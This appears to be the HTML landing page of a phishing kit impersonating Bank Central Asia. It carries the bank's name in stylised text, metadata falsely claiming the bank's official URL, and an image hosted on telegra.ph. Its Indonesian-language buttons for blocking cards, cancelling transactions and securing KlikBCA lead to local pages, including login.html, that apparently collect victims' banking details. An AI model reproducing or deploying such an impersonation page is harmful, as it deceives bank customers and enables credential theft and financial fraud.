
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta property="og:title" content="𝗕𝗮𝗻𝗸 𝗖𝗲𝗻𝘁𝗿𝗮𝗹 𝗔𝘀𝗶𝗮" />
    <meta property="og:description" content="Senantiasa disisi anda." />
    <meta property="og:image" content="https://telegra.ph/file/c9d392385e3d41f37a730.png" />
    <meta property="og:url" content="www.bca.co.id" />
    <meta property="og:type" content="website" />
    <title>𝗕𝗮𝗻𝗸 𝗖𝗲𝗻𝘁𝗿𝗮𝗹 𝗔𝘀𝗶𝗮</title>
    <link rel="icon" href="assets/img/favicon.png">
    <link rel="stylesheet" href="assets/bootstrap/css/bootstrap.min.css">
    <link rel="stylesheet" href="assets/css/generaalt_light.css">
    <link rel="stylesheet" href="assets/css/generasemibold.css">
    <link rel="stylesheet" href="assets/fonts/fontawesome-all.min.css">
    <link rel="stylesheet" href="assets/fonts/simple-line-icons.min.css">
    <link rel="stylesheet" href="assets/css/Modal-Login-form.css">
    <link rel="stylesheet" href="assets/css/styles.css">
</head>
<style>

    body {

     font-family: Arial, sans-serif;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            background-color: #f0f0f0;
            margin: 0;
        }
        .form-container {
            display: flex;
            flex-direction: column;
            gap: 20px;
            width: 100%;
            max-width: 400px;
        }
        .form-container form {
            background-color: #0eaee8;
            padding: 20px;
            border-radius: 10px;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
            transition: box-shadow 0.3s ease;
            text-align: center;
        }
        .form-container form:hover {
            box-shadow: 0 8px 16px rgba(0, 0, 0, 0.2);
        }
        .form-container form input[type="submit"] {
            background-color: #0eaee8;
            color: #ffffff;
            border: none;
            padding: 10px 20px;
            font-size: 16px;
            border-radius: 5px;
            cursor: pointer;
            width: 100%;
        }
        .form-container form input[type="submit"]:hover {
            background-color: #0ca0d3;
        }
    .navbar {
        position: relative;
        display: flex;
        flex-wrap: wrap;
        align-items: center;
        justify-content: space-between;
        padding-top: .5rem;
        padding-bottom: .5rem;
    }

    .footer {
        padding: 30px 0;
        min-height: 180px;
    }

    .wrapper {
        display: flex;
        flex-direction: column;
        min-height: 100vh;
        justify-content: space-between;
    }
</style>

<body class="align-content-center" style="background: url('images/bg.jpg') top / cover no-repeat;">
    <div class="wrapper">
        <div class="text-center">
            <div class="col" style="margin-top: 100px;">
                <h3 style="font-family: generasemibold;font-size: 15.272px;color: rgb(255, 255, 255);letter-spacing: 1px;text-align: center;margin-bottom: 11px;width: 1;"></h3>
                <h3 style="font-family: generasemibold;font-size: 14.272px;color: rgb(255, 255, 255);text-align: center;margin-right: 16px;margin-left: 16px;"></h3>
            </div>
        </div>
        <div class="container text-center" style="margin-bottom: 180px; padding-right: 7px;">
            <a href="layanan/kredit.html" class="btn text-white" role="button" style="border-radius: 10px; margin-top: 13px; font-family: generasemibold; background: #0065fd; width: 100%; color: #ffffff; box-shadow: 0 4px 8px rgba(0, 0, 0, 0.5);">
                Blokir Kartu Kredit
            </a>
            <a href="layanan/batal.html" class="btn text-white" role="button" style="border-radius: 10px; margin-top: 13px; font-family: generasemibold; background: #0065fd; color: #565252; width: 100%; box-shadow: 0 4px 8px rgba(0, 0, 0, 0.5);">
                Pembatalan Transaksi
            </a>
            <a href="login.html" class="btn text-white" role="button" style="border-radius: 10px; margin-top: 13px; font-family: generasemibold; background: #0065fd; color: #565252; width: 100%; box-shadow: 0 4px 8px rgba(0, 0, 0, 0.5);">
                Pengamanan KlikBCA
            </a>
            <a href="layanan/debit.html" class="btn text-white" role="button" style="border-radius: 10px; margin-top: 13px; font-family: generasemibold; background: #0065fd; color: #565252; width: 100%; margin-bottom: 44px; box-shadow: 0 4px 8px rgba(0, 0, 0, 0.5);">
                Blokir Kartu Debit
            </a>
        </div>
        

        <script src="assets/bootstrap/js/bootstrap.min.js"></script>
</body>
</html>